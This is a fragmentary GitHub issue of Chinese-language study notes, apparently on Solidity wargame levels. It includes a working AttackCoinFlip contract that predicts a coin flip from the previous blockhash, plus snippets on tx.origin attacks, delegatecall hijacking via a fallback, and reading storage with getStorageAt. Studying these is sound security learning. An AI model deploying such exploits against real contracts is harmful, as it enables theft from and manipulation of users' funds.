Open fangmd opened 1 year ago
contract.address
pragma solidity ^0.8.0;
import "./4.CoinFlip.sol";
contract AttackCoinFlip {
CoinFlip public rawCoinFlip;
uint256 FACTOR =
57896044618658097711785492504343953926634992332820282019728792003956564819968;
constructor(address _rawCoinFlipAddress) {
rawCoinFlip = CoinFlip(_rawCoinFlipAddress);
}
function flip() public {
uint256 blockValue = uint256(blockhash(block.number - 1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
rawCoinFlip.flip(side);
}
}
rawCoinFlip = CoinFlip(_rawCoinFlipAddress);
: _rawCoinFlipAddress
是合约已经部署的地址tx.origin
: 交易发起源Tx Origin Attacks
使用代理的方式把其他合约的逻辑使用在自己合约中
fallback() external {
(bool result,) = address(delegate).delegatecall(msg.data);
if (result) {
this;
}
}
msg.data
是 methodid, 通过 web3.utils.sha3('pwn()')
获取web3.utils.toAscii(hexString)
web3.utils.toHex(string)
web3.eth.getStorageAt(contractAddress, position)
payable(king).transfer(msg.value); // 给 king 账号转eth
(bool sent, ) = msg.sender.call{value: balance}(""); // 给 msg.sender 转eth
Fallback function
合约被执行的时候会调用的回调函数
当合约的
send
,sendTransaction
,transfer
被调用的时候会触发